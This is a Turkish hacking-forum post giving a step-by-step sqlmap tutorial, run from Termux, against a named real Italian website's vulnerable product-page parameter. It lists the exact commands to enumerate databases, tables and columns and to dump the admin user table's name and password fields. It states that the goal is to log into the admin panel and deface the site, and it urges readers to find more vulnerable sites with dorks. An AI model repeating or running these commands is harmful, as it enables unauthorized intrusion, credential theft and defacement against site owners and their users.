Sqlmap Kullanımı [Termux]

  • Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

JAKEPOW


Major
Katılım
Nis 26, 2020
Mesajlar
58
Tepkime puanı
33
Puanları
18
Öncelikle termuxu açalalım ve sqlmap'i çalıştıralım sqlmapi çalıştırmayı bilmeyenler için şu komutlarla çalıştırıyoruz.
cd sqlmap yazıyor sonra python2 sqlmap.py yazıyoruz ve sqlmap çalışıyor.

Öncelikle sql açıklı bir site buluyorz bunuda dorklar yardımıyla bulabilirsiniz ben size örnek olarak site vereyim bunu kullanın öğrenmek için
site:http://www.marim.it/prodotti.php?id=498 bu siteyi kullanın şimdi geçelim sqlmap kullanımına.

python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 --dbs yazıyoruz ve sitenin databasesini çekiyoruz --dbs yazan sonraki kısımda 2 tane tire (-) var.
database.png
Eğer databaseleri doğru çektiysek böyle bi ekran gelir burda işarettede gördüğünüz gibi 2 tane database buldu 1.olan yani information_schema genelde her sitede olur bize lazım olan 2. olan siteden siteye 2.de yazan isim değişebilir şimdi bulduğumuz databaseden tabloları çekiceğiz onuda şu komutla
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim --tables şeklinde yazıyoruz ve bu sayede databasemizin tablesını çekiyoruz tables yazan yerde 2 tane tire(-) var ona dikkat edelim wwwmarim yazan yerede database ismimizi yazıyoruz tabikide bu siteden siteye değişir yukarıdada söyledğim gibi tables.png
Eğer doğru yaptıysak böyle bir ekran gelir.Tablolarında çektiğimize göre sırada Columns ları çekme var oda şu şekilde burdaki tabloların hangisinde admin bilgilerinin olucağını düşünüyorsak onun bilgilerini çekmemiz gerek burda biraz isimler yabancı normalde admin users falan gibi kelimeler olur burdaki admin bilgilerin olduğu tablo ise utente yazan en altaki onun columnslarınıda şu şekilde çekiyoruz
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim -T utente --columns yazarak utente adlı tablonun columnslarını çekeriz.
columns.png
Eğer bu şekilde yaptıysak doğru yapmışız demekdir.Şimdi çektiğimiz columnslardan admin bilgilerini çekiceğiz.Bakın resimdede gördüğünüz gibi password falan yazıyor bizede orda admin bilgileri için gerekli olan şeyleri çekiceğiz arkadaşlar ama sitede bir sorun var acale konu açmam gerektiğinden bakmamıştım password kısmı çekince ve nome hiçbişey yazmıyor siz başka sitelerde denerseniz yazdığını görürsünüz ben yinede size nasıl o bilgilerin çekilceğini göstereceğim oda şu komutla
python2 sqlmap.py -u http://www.marim.it/prodotti.php?id=498 -D wwwmarim -T utente -C nome,password --dump şeklinde admin bilgileri elimize ulaşmış olucak.dump.png
Site sorunlu olduğu için nome ve password kısmı boş çıkdı siz başka sitelerde denerseniz dolu çıktığını görürsünüz ve o bilgilerle admin paneline girip siteye indexinizi yapıştırabilirsiniz.


Not: İLK KONUM OLDUĞUNDAN BİRAZ ACEMİCE OLMUŞ OLABİLİR KUSURA BAKMAYIN
ANLAMADIĞINIZ BİŞEY OLURSA FORUM CHATİNDEN BANA SORU SORABİLİRSİNSİZ TEŞEKÜRLER.